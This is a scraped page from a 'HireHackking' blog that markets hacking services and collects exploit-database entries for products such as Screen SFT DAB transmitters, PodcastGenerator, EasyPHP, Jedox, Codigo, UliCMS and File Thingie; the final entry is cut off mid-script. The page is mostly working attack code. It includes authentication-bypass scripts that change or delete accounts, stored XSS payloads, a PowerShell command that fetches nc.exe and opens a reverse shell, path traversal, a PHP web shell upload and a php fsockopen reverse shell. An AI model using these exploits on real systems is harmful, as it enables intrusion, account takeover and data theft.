Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863115631

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
#!/usr/bin/env python3
#
# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Password Change
# Exploit Author: LiquidWorm
#
#
# Vendor: DB Elettronica Telecomunicazioni SpA
# Product web page: https://www.screen.it | https://www.dbbroadcast.com
#                   https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
# Affected version: Firmware: 1.9.3
#                   Bios firmware: 7.1 (Apr 19 2021)
#                   Gui: 2.46
#                   FPGA: 169.55
#                   uc: 6.15
#
# Summary: Screen's new radio DAB Transmitter is reaching the highest
# technology level in both Digital Signal Processing and RF domain.
# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
# digital adaptive precorrection and configuatio flexibility, the Hot
# Swap System technology, the compactness and the smart system design,
# the SFT DAB are advanced transmitters. They support standards DAB,
# DAB+ and T-DMB and are compatible with major headend brands.
#
# Desc: The application suffers from a weak session management that can
# allow an attacker on the same network to bypass these controls by reusing
# the same IP address assigned to the victim user (NAT) and exploit crucial
# operations on the device itself. By abusing the IP address property that
# is binded to the Session ID, one needs to await for such an established
# session and issue unauthorized requests to the vulnerable API to manage
# and/or manipulate the affected transmitter.
#
# Tested on: Keil-EWEB/2.1
#            MontaVista® Linux® Carrier Grade eXpress (CGX)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2023-5772
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5772.php
#
#
# 19.03.2023
#

import hashlib,datetime##########
import requests,colorama#########
from colorama import Fore, Style#
colorama.init()
print(Fore.RED+Style.BRIGHT+
    '''
██████  ███████ ███    ███ ██ ███    ██ ██████  ███████ ██████  
██   ██ ██      ████  ████ ██ ████   ██ ██   ██ ██      ██   ██ 
██████  █████   ██ ████ ██ ██ ██ ██  ██ ██   ██ █████   ██████  
██   ██ ██      ██  ██  ██ ██ ██  ██ ██ ██   ██ ██      ██   ██ 
██   ██ ███████ ██      ██ ██ ██   ████ ██████  ███████ ██   ██ 
    '''
    +Style.RESET_ALL)
print(Fore.WHITE+Style.BRIGHT+
    '''
            ZSL and the Producers insist that no one
           submit any exploits of themselfs or others
              performing any dangerous activities.
                 We will not open or view them.
    '''
    +Style.RESET_ALL)
s=datetime.datetime.now()
s=s.strftime('%d.%m.%Y %H:%M:%S')
print('Starting API XPL -',s)
t=input('Enter transmitter ip: ')
u=input('Enter desired username: ')
p=input('Enter desired password: ')
e='/system/api/userManager.cgx'
m5=hashlib.md5()
m5.update(p.encode('utf-8'))
h=m5.hexdigest()
print('Your sig:',h)
print('Calling object: ssbtObj')
print('CGX fastcall: userManager::changeUserPswd')
t='http://'+t+e
bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
    'Accept':'application/json, text/plain, */*',
    'Accept-Language':'ku-MK,en;q=0.9',
    'Accept-Encoding':'gzip, deflate',
    'User-Agent':'Dabber+',
    'Connection':'close'}
j={'ssbtIdx':0,
   'ssbtType':'userManager',
   'ssbtObj':{
             'changeUserPswd':{
                              'username':u,
                              'password':h
                              }
             },
   }
r=requests.post(t,headers=bh,json=j)
if r.status_code==200:
    print('Done.')
else:
    print('Error')
exit(-4)
HireHackking 
#Exploit Title: PodcastGenerator 3.2.9 - Multiple Stored Cross-Site Scripting (XSS)
#Application: PodcastGenerator
#Version: v3.2.9
#Bugs:  Stored Xss
#Technology: PHP
#Vendor URL: https://podcastgenerator.net/
#Software Link: https://github.com/PodcastGenerator/PodcastGenerator
#Date of found: 14-05-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux 

2. Technical Details & POC
========================================
steps: 

#########XSS -1##############

1.go to 'Episodes' then 'Upload New Episodes'(http://localhost/PodcastGenerator/admin/episodes_upload.php)
2.set title section as <img src=1 onerror=alert("XSS-1")>
3.And go to 'View All Episoded'(http://localhost/PodcastGenerator/admin/episodes_list.php)

payload: <img src=1 onerror=alert("XSS-1")>

poc- request:

POST /PodcastGenerator/admin/episodes_upload.php HTTP/1.1
Host: localhost
Content-Length: 8307
Cache-Control: max-age=0
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3NXAbhxohxCgUFNi
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/PodcastGenerator/admin/episodes_upload.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=b8oeamte4ebbhtu52dgnsrkljn
Connection: close

------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="file"; filename="2023-05-13_2_images.jpeg"
Content-Type: image/jpeg

image content asdfasdfasdfasdfasdfasdfasdfa


------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="title"

<img src=1 onerror=alert("XSS-1")>
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="shortdesc"

fffff
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="date"

2023-05-14
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="time"

11:05
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="episodecover"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="longdesc"


------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="episodenum"


------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="seasonnum"


------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="itunesKeywords"


------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="explicit"

yes
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="authorname"


------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="authoremail"


------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="customtags"


------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="token"

6GnmEMNnhFfyNeTRciGsh8p4R4djazh8
------WebKitFormBoundary3NXAbhxohxCgUFNi--






#########XSS -2##############
1.go to "Themes and aspect" then "Customize your Freebox" (http://localhost/PodcastGenerator/admin/theme_freebox.php)
2. set Freebox content as <script>alert("XSS-2")</script>
3.go to home page (http://localhost/PodcastGenerator/)

payload: <script>alert("XSS-2")</script>

poc Request:

POST /PodcastGenerator/admin/theme_freebox.php?change=1 HTTP/1.1
Host: localhost
Content-Length: 96
Cache-Control: max-age=0
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/PodcastGenerator/admin/theme_freebox.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=b8oeamte4ebbhtu52dgnsrkljn
Connection: close

content=%3Cscript%3Ealert%28%22XSS-2%22%29%3C%2Fscript%3E&token=6GnmEMNnhFfyNeTRciGsh8p4R4djazh8

#########XSS -3##############

1. go to "Podcast Details" then "Change Podcast Details" (http://localhost/PodcastGenerator/admin/podcast_details.php)
2. set "Podcast tile " as <svg/onload=prompt("XSS-3")>
3.go to home page (http://localhost/PodcastGenerator/)

payload: <svg/onload=prompt("XSS-3")>
 
poc-request:

POST /PodcastGenerator/admin/podcast_details.php?edit=1 HTTP/1.1
Host: localhost
Content-Length: 300
Cache-Control: max-age=0
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/PodcastGenerator/admin/podcast_details.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=b8oeamte4ebbhtu52dgnsrkljn
Connection: close

podcast_title=%3Csvg%2Fonload%3Dprompt%28%22XSS-3%22%29%3E&podcast_subtitle=dd&podcast_description=dd&copyright=dd&author_name=Podcast+Generator+UserP&author_email=podcastgenerator%40example.com&podcast_guid=&feed_language=en&explicit_podcast=yes&feed_locked=no&token=xVrlAT6NG2ZrbGanycblGYoOOIitXXKC
HireHackking 
#!/usr/bin/env python3
#
# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Erase Account
# Exploit Author: LiquidWorm
#
#
# Vendor: DB Elettronica Telecomunicazioni SpA
# Product web page: https://www.screen.it | https://www.dbbroadcast.com
#                   https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
# Affected version: Firmware: 1.9.3
#                   Bios firmware: 7.1 (Apr 19 2021)
#                   Gui: 2.46
#                   FPGA: 169.55
#                   uc: 6.15
#
# Summary: Screen's new radio DAB Transmitter is reaching the highest
# technology level in both Digital Signal Processing and RF domain.
# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
# digital adaptive precorrection and configuatio flexibility, the Hot
# Swap System technology, the compactness and the smart system design,
# the SFT DAB are advanced transmitters. They support standards DAB,
# DAB+ and T-DMB and are compatible with major headend brands.
#
# Desc: The application suffers from a weak session management that can
# allow an attacker on the same network to bypass these controls by reusing
# the same IP address assigned to the victim user (NAT) and exploit crucial
# operations on the device itself. By abusing the IP address property that
# is binded to the Session ID, one needs to await for such an established
# session and issue unauthorized requests to the vulnerable API to manage
# and/or manipulate the affected transmitter.
#
# Tested on: Keil-EWEB/2.1
#            MontaVista® Linux® Carrier Grade eXpress (CGX)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2023-5773
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5773.php
#
#
# 19.03.2023
#

import hashlib,datetime##########
import requests,colorama#########
from colorama import Fore, Style#
colorama.init()
print(Fore.RED+Style.BRIGHT+
    '''
██████  ███████ ███    ███ ██ ███    ██ ██████  ███████ ██████  
██   ██ ██      ████  ████ ██ ████   ██ ██   ██ ██      ██   ██ 
██████  █████   ██ ████ ██ ██ ██ ██  ██ ██   ██ █████   ██████  
██   ██ ██      ██  ██  ██ ██ ██  ██ ██ ██   ██ ██      ██   ██ 
██   ██ ███████ ██      ██ ██ ██   ████ ██████  ███████ ██   ██ 
    '''
    +Style.RESET_ALL)
print(Fore.WHITE+Style.BRIGHT+
    '''
            ZSL and the Producers insist that no one
           submit any exploits of themselfs or others
              performing any dangerous activities.
                 We will not open or view them.
    '''
    +Style.RESET_ALL)
s=datetime.datetime.now()
s=s.strftime('%d.%m.%Y %H:%M:%S')
print('Starting API XPL -',s)
t=input('Enter transmitter ip: ')
u=input('Enter desired username: ')
e='/system/api/userManager.cgx'
print('Calling object: ssbtObj')
print('CGX fastcall: userManager::removeUser')
t='http://'+t+e
bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
    'Accept':'application/json, text/plain, */*',
    'Accept-Language':'ku-MK,en;q=0.9',
    'Accept-Encoding':'gzip, deflate',
    'User-Agent':'Dabber-',
    'Connection':'close'}
j={'ssbtIdx':0,
   'ssbtType':'userManager',
   'ssbtObj':{
             'removeUser':u
             }
   }
r=requests.post(t,headers=bh,json=j)
if r.status_code==200:
    print('Done.')
else:
    print('Error')
exit(-3)
HireHackking 
# Exploit Title: EasyPHP Webserver 14.1 - Multiple Vulnerabilities (RCE and
Path Traversal)
# Discovery by: Rafael Pedrero
# Discovery Date: 2022-02-06
# Vendor Homepage: https://www.easyphp.org/
# Software Link : https://www.easyphp.org/
# Tested Version: 14.1
# Tested on:  Windows 7 and 10

# Vulnerability Type: Remote Command Execution (RCE)

CVSS v3: 9.8
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-78

Vulnerability description: There is an OS Command Injection in EasyPHP
Webserver 14.1 that allows an attacker to achieve Remote Code Execution
(RCE) with administrative privileges.

Proof of concept:

To detect:

POST http://127.0.0.1:10000/index.php?zone=settings HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
Origin: http://127.0.0.1:10000
Connection: keep-alive
Referer: http://127.0.0.1:10000/index.php?zone=settings
Host: 127.0.0.1:10000

app_service_control=calc.exe

The calculator opens.

Exploit:

# !/usr/bin/python3
import requests
import sys

if len(sys.argv) != 5:
    print("RCE: EasyPHP Webserver 14.1 and before - by Rafa")
    print("Usage:   %s <TARGET> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT>" %
sys.argv[0])
    print("Example:   %s 192.168.1.10 10000 192.168.1.11 9001" %
sys.argv[0])
    exit(1)

else:
    target = sys.argv[1]
    targetport = sys.argv[2]
    localip = sys.argv[3]
    localport = sys.argv[4]
    # python3 -m http.server / python2 -m SimpleHTTPServer with nc.exe in
the directory

    payload =
"powershell+-command+\"((new-object+System.Net.WebClient).DownloadFile('http://"
+ localip + ':8000' +
"/nc.exe','%TEMP%\\nc.exe'))\";\"c:\windows\\system32\\cmd.exe+/c+%TEMP%\\nc.exe+"
+ localip + "+" + localport + "+-e+cmd.exe\""
    print (payload)
    url = 'http://' + target + ':' + targetport + '/index.php?zone=settings'
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4433.0 Safari/537.36"
    }
    data = {'app_service_control':payload}

    try:
        r = requests.post(url, headers=headers, data=data)
    except requests.exceptions.ReadTimeout:
        print("The payload has been sent. Check it!")
        pass


# Vulnerability Type: Path Traversal

CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
CWE: CWE-22

Vulnerability description: An issue was discovered in EasyPHP Webserver
14.1. An Absolute Path Traversal vulnerability in / allows remote users to
bypass intended SecurityManager restrictions and download any file if you
have adequate permissions outside the documentroot configured on the server.

Proof of concept:

GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini
HTTP/1.1
Host: 192.168.X.X:10000
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML,
like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

HTTP/1.1 200 OK
Host: 192.168.X.X:10000
Connection: close
Content-Type: application/octet-stream
Content-Length: 499

; for 16-bit app support [fonts] [extensions] [mci extensions] [files]
[Mail] MAPI=1 CMCDLLNAME32=mapi32.dll CMCDLLNAME=mapi.dll CMC=1 MAPIX=1
MAPIXVER=1.0.0.1 OLEMessaging=1 [MCI Extensions.BAK] 3g2=MPEGVideo
3gp=MPEGVideo 3gp2=MPEGVideo 3gpp=MPEGVideo aac=MPEGVideo adt=MPEGVideo
adts=MPEGVideo m2t=MPEGVideo m2ts=MPEGVideo m2v=MPEGVideo m4a=MPEGVideo
m4v=MPEGVideo mod=MPEGVideo mov=MPEGVideo mp4=MPEGVideo mp4v=MPEGVideo
mts=MPEGVideo ts=MPEGVideo tts=MPEGVideo
HireHackking
# Exploit Title: Jedox 2020.2.5 - Disclosure of Database Credentials via Improper Access Controls # Date: 28/04/2023 # Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL # Vendor Homepage: https://jedox.com # Version: Jedox 2020.2 (20.2.5) and older # CVE : CVE-2022-47874 Introduction ================= Improper access controls in `/tc/rpc` allows remote authenticated users to view details of database connections via the class `com.jedox.etl.mngr.Connections` and the method `getGlobalConnection`. To exploit the vulnerability, the attacker must know the name of the database connection. Write-Up ================= See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability. Proof of Concept ================= 1) List all available database connections via `conn::ls` (see also: CVE-2022-47879): PATH: /be/rpc.php METHOD: POST BODY: [ [ "conn", "ls", [ null, false, true, [ "type", "active", "description" ] ] ] ] 2) Retrieve details of a database connection (specify connection name via CONNECTION) including encrypted credentials using the Java RPC function `com.jedox.etl.mngr.Connection::getGlobalConnection`: PATH: /tc/rpc METHOD: POST BODY: [ [ "com.jedox.etl.mngr.Connections", "getGlobalConnection", [ "<CONNECTION>" ] ] ]
HireHackking

Codigo Markdown Editor v1.0.1 (Electron) - Remote Code Execution

HACKER · %s · %s

# Exploit Title: Codigo Markdown Editor v1.0.1 (Electron) - Arbitrary Code Execution # Date: 2023-05-03 # Exploit Author: 8bitsec # Vendor Homepage: https://alfonzm.github.io/codigo/ # Software Link: https://github.com/alfonzm/codigo-app # Version: 1.0.1 # Tested on: [Mac OS 13] Release Date: =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D 2023-05-03 Product & Service Introduction: =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D A Markdown editor & notes app made with Vue & Electron Technical Details & Description: =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D A vulnerability was discovered on Codigo markdown editor v1.0.1 allowing a = user to execute arbitrary code by opening a specially crafted file. Proof of Concept (PoC): =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D Arbitrary code execution: Create a markdown file (.md) in any text editor and write the following pay= load: <video><source onerror=3D"alert(require('child_process').execSync('/System/= Applications/Calculator.app/Contents/MacOS/Calculator').toString());"> Opening the file in Codigo will auto execute the Calculator application.
HireHackking

Ulicms-2023.1 sniffing-vicuna - Remote Code Execution (RCE)

HACKER · %s · %s

#Exploit Title: Ulicms-2023.1 sniffing-vicuna - Remote Code Execution (RCE) #Application: Ulicms #Version: 2023.1-sniffing-vicuna #Bugs: RCE #Technology: PHP #Vendor URL: https://en.ulicms.de/ #Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip #Date of found: 04-05-2023 #Author: Mirabbas Ağalarov #Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. Login to account and edit profile. 2.Upload new Avatar 3. It is possible to include the php file with the phar extension when uploading the image. Rce is triggered when we visit it again. File upload error may occur, but this does not mean that the file is not uploaded and the file location is shown in the error payload: <?php echo system("cat /etc/passwd"); ?> poc request : POST /dist/admin/index.php HTTP/1.1 Host: localhost Content-Length: 1982 Cache-Control: max-age=0 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYB7QS1BMMo1CXZVy User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/dist/admin/index.php?action=admin_edit&id=12&ref=home Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: 64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delv Connection: close ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="csrf_token" e2d428bc0585c06c651ca8b51b72fa58 ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="sClass" UserController ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="sMethod" update ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="avatar"; filename="salam.phar" Content-Type: application/octet-stream <?php echo system("cat /etc/passwd"); ?> ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="edit_admin" edit_admin ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="id" 12 ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="firstname" account1 ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="lastname" account1 ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="email" account1@test.com ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="password" ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="password_repeat" ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="group_id" 1 ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="secondary_groups[]" 1 ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="homepage" ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="html_editor" ckeditor ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="admin" 1 ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="default_language" ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="about_me" ------WebKitFormBoundaryYB7QS1BMMo1CXZVy-- response: Error GmagickException: No decode delegate for this image format (/var/www/html/dist/content/tmp/645364e62615b.phar) in /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php:67 Stack trace: #0 /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php(67): Gmagick->__construct() #1 /var/www/html/dist/App/non_namespaced/User.php(1110): Imagine\Gmagick\Imagine->open() #2 /var/www/html/dist/App/non_namespaced/User.php(1089): User->processAvatar() #3 /var/www/html/dist/content/modules/core_users/controllers/UserController.php(124): User->changeAvatar() #4 /var/www/html/dist/App/non_namespaced/Controller.php(82): UserController->updatePost() #5 /var/www/html/dist/App/non_namespaced/ControllerRegistry.php(67): Controller->runCommand() #6 /var/www/html/dist/admin/index.php(66): ControllerRegistry::runMethods() #7 {main} Next Imagine\Exception\RuntimeException: Unable to open image /var/www/html/dist/content/tmp/645364e62615b.phar in /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php:73 Stack trace: #0 /var/www/html/dist/App/non_namespaced/User.php(1110): Imagine\Gmagick\Imagine->open() #1 /var/www/html/dist/App/non_namespaced/User.php(1089): User->processAvatar() #2 /var/www/html/dist/content/modules/core_users/controllers/UserController.php(124): User->changeAvatar() #3 /var/www/html/dist/App/non_namespaced/Controller.php(82): UserController->updatePost() #4 /var/www/html/dist/App/non_namespaced/ControllerRegistry.php(67): Controller->runCommand() #5 /var/www/html/dist/admin/index.php(66): ControllerRegistry::runMethods() #6 {main} 4. Go to /var/www/html/dist/content/tmp/645364e62615b.phar (http://localhost/dist/content/tmp/645364e62615b.phar)
HireHackking

File Thingie 2.5.7 - Remote Code Execution (RCE)

HACKER · %s · %s

#!/usr/bin/python # Exploit Title: File Thingie 2.5.7 - Arbitary File Upload to RCE # Google Dork: N/A # Date: 27th of April, 2023 # Exploit Author: Maurice Fielenbach (grimlockx) - Hexastrike Cybersecurity UG (haftungsbeschränkt) # Software Link: https://github.com/leefish/filethingie # Version: 2.5.7 # Tested on: N/A # CVE: N/A # Vulnerability originally discovered / published by Cakes # Reference: https://www.exploit-db.com/exploits/47349 # Run a local listener on your machine and you're good to go import os import argparse import requests import random import string import zipfile from urllib.parse import urlsplit, urlunsplit, quote class Exploit: def __init__(self, target, username, password, lhost, lport): self.target = target self.username = username self.password = password self.lhost = lhost self.lport = lport def try_login(self) -> bool: self.session = requests.Session() post_body = {"ft_user": f"{self.username}", "ft_pass": f"{self.password}", "act": "dologin"} response = self.session.post(self.target, data=post_body) if response.status_code == 404: print(f"[-] 404 Not Found - The requested resource {self.target} was not found") return False elif response.status_code == 200: if "Invalid username or password" in response.text: print(f"[-] Invalid username or password") return False return True def create_new_folder(self) -> bool: # Generate random string letters = string.ascii_letters self.payload_filename = "".join(random.choice(letters) for i in range(16)) headers = {"Content-Type": "application/x-www-form-urlencoded"} post_body = {f"type": "folder", "newdir": f"{self.payload_filename}", "act": "createdir", "dir": "", "submit" :"Ok"} print(f"[*] Creating new folder /{self.payload_filename}") response = self.session.post(self.target, headers=headers, data=post_body) if f"index.php?dir=/{self.payload_filename}" in response.text: print(f"[+] Created new folder /{self.payload_filename}") return True else: print(f"[-] Could not create new folder /{self.payload_filename}") return False def create_payload(self) -> bool: try: with zipfile.ZipFile(f"{self.payload_filename}.zip", 'w', compression=zipfile.ZIP_DEFLATED) as zip_file: zip_file.writestr(f"{self.payload_filename}.php", "<?php if(isset($_REQUEST[\'cmd\'])){ echo \"<pre>\"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo \"</pre>\"; die; }?>") print(f"[+] Zipped payload to {self.payload_filename}.zip") return True except: print(f"[-] Could not zip payload to {self.payload_filename}.zip") return False def upload_payload(self) -> bool: # Set up the HTTP headers and data for the request headers = { b'Content-Type': b'multipart/form-data; boundary=---------------------------grimlockx' } post_body = ( '-----------------------------grimlockx\r\n' 'Content-Disposition: form-data; name="localfile-1682513975953"; filename=""\r\n' 'Content-Type: application/octet-stream\r\n\r\n' ) post_body += ( '\r\n-----------------------------grimlockx\r\n' 'Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n' '2000000\r\n' '-----------------------------grimlockx\r\n' f'Content-Disposition: form-data; name="localfile"; filename="{self.payload_filename}.zip"\r\n' 'Content-Type: application/zip\r\n\r\n' ) # Read the zip file contents and append them to the data with open(f"{self.payload_filename}.zip", "rb") as f: post_body += ''.join(map(chr, f.read())) post_body += ( '\r\n-----------------------------grimlockx\r\n' 'Content-Disposition: form-data; name="act"\r\n\r\n' 'upload\r\n' '-----------------------------grimlockx\r\n' 'Content-Disposition: form-data; name="dir"\r\n\r\n' f'/{self.payload_filename}\r\n' '-----------------------------grimlockx\r\n' 'Content-Disposition: form-data; name="submit"\r\n\r\n' 'Upload\r\n' '-----------------------------grimlockx--\r\n' ) print("[*] Uploading payload to the target") response = self.session.post(self.target, headers=headers, data=post_body) if f"<a href=\"./{self.payload_filename}/{self.payload_filename}.zip\" title=\"Show {self.payload_filename}.zip\">{self.payload_filename}.zip</a>" in response.text: print("[+] Uploading payload successful") return True else: print("[-] Uploading payload failed") return False def get_base_url(self) -> str: url_parts = urlsplit(self.target) path_parts = url_parts.path.split('/') path_parts.pop() base_url = urlunsplit((url_parts.scheme, url_parts.netloc, '/'.join(path_parts), "", "")) return base_url def unzip_payload(self) -> bool: print("[*] Unzipping payload") headers = {"Content-Type": "application/x-www-form-urlencoded"} post_body = {"newvalue": f"{self.payload_filename}.zip", "file": f"{self.payload_filename}.zip", "dir": f"/{self.payload_filename}", "act": "unzip"} response = self.session.post(f"{self.target}", headers=headers, data=post_body) if f"<p class='ok'>{self.payload_filename}.zip unzipped.</p>" in response.text: print("[+] Unzipping payload successful") print(f"[+] You can now execute commands by browsing {self.get_base_url()}/{self.payload_filename}/{self.payload_filename}.php?cmd=<command>") return True else: print("[-] Unzipping payload failed") return False def execute_payload(self) -> bool: print("[*] Trying to get a reverse shell") cmd = quote(f"php -r \'$sock=fsockopen(\"{self.lhost}\",{self.lport});system(\"/bin/bash <&3 >&3 2>&3\");\'") print("[*] Executing payload") response = self.session.get(f"{self.get_base_url()}/{self.payload_filename}/{self.payload_filename}.php?cmd={cmd}") print("[+] 